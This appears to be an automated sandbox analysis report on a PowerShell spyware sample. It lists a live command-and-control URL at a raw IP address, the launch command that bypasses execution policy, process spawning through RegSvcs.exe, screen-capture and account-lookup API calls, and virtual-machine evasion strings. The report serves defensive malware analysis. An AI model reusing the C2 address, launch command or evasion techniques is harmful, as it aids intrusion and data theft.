Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.php
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.php)-
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.php-
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.php0
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpD
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpE
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpJ
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpK
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpV
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpW-;
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpXNtM2ZDgETkWRZnZWM=
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpZ-
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpb
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpd
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpdK
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phped
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phped/
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpedY
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpj
Source: RegSvcs.exe, 00000003.00000002.4127608803.0000000001473000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpl
Source: RegSvcs.exe, 00000003.00000002.4127608803.0000000001407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpmmon
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpn-
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpq
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpw
Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000144B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.131/8Fvu5jh4DbS/index.phpx
Source: powershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.0.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1840009085.00000296CBA71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD63F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1840009085.00000296CCC64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1864550591.00000296DC2DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CD7B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1840009085.00000296CD403000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004061F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority, | 3_2_004061F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAACF3C | 0_2_00007FFD9BAACF3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004061F0 | 3_2_004061F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040B700 | 3_2_0040B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004460F4 | 3_2_004460F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043D169 | 3_2_0043D169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004051A0 | 3_2_004051A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00444347 | 3_2_00444347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00405450 | 3_2_00405450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042B7C0 | 3_2_0042B7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042F9DB | 3_2_0042F9DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043C9DD | 3_2_0043C9DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB58 | 3_2_0045DB58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB7C | 3_2_0045DB7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB10 | 3_2_0045DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBDC | 3_2_0045DBDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBD8 | 3_2_0045DBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBE4 | 3_2_0045DBE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBE0 | 3_2_0045DBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBEC | 3_2_0045DBEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBE8 | 3_2_0045DBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBF4 | 3_2_0045DBF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBF0 | 3_2_0045DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBFC | 3_2_0045DBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBF8 | 3_2_0045DBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB84 | 3_2_0045DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB80 | 3_2_0045DB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB8C | 3_2_0045DB8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB88 | 3_2_0045DB88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB94 | 3_2_0045DB94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB90 | 3_2_0045DB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB9C | 3_2_0045DB9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DB98 | 3_2_0045DB98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045DBA0 | 3_2_0045DBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045CE78 | 3_2_0045CE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0045CE7B | 3_2_0045CE7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00404EF0 | 3_2_00404EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00432F20 | 3_2_00432F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00445FD4 | 3_2_00445FD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0042A870 appears 56 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00423340 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00424250 appears 136 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0042A021 appears 59 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 004061F0 appears 31 times
Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@8/10@0/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize, | 3_2_0040E8D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\4340bbf41c5952b1373dfe1ff8834fec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olyabqw3.khj.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: nYT1CaXH9N.ps1 | Virustotal: Detection: 8%
Source: nYT1CaXH9N.ps1 | ReversingLabs: Detection: 23%
Source: RegSvcs.exe | String found in binary or memory: " /add /y
Source: RegSvcs.exe | String found in binary or memory: " /add
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wer.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: aepic.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1839941977.00000296CB9E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CCC64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CBC97000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAADB29 push edi; iretd | 0_2_00007FFD9BAADB3A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAADAA9 push edi; iretd | 0_2_00007FFD9BAADABA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAAD9D4 push esp; iretd | 0_2_00007FFD9BAAD9DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAAD909 push edx; iretd | 0_2_00007FFD9BAAD91A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAAD94C push esp; iretd | 0_2_00007FFD9BAAD96A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAAD944 push ebx; iretd | 0_2_00007FFD9BAAD94A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAA392A push es; retf | 0_2_00007FFD9BAA3952
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAAD889 push edx; iretd | 0_2_00007FFD9BAAD89A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAAD7E9 push eax; iretd | 0_2_00007FFD9BAAD7FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BAAE83C push esp; ret | 0_2_00007FFD9BAAE842
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042A2C1 push ecx; ret | 3_2_0042A2D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004175DF pushad ; iretd | 3_2_004175E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00415FEF pushad ; iretd | 3_2_00415FF0

                Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004293ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004293ED
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: FirmwareTableInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 180000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3816
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 4517
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 5318
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008 | Thread sleep time: -13835058055282155s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004093D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,3_2_004093D0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 30000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 180000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 30000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: Amcache.hve.0.dr | Binary or memory string: VMware
                Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.0.dr | Binary or memory string: vmci.syshbin
                Source: Amcache.hve.0.dr | Binary or memory string: VMware, Inc.
                Source: Amcache.hve.0.dr | Binary or memory string: VMware20,1hbin@
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000141F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
                Source: Amcache.hve.0.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.0.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.0.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
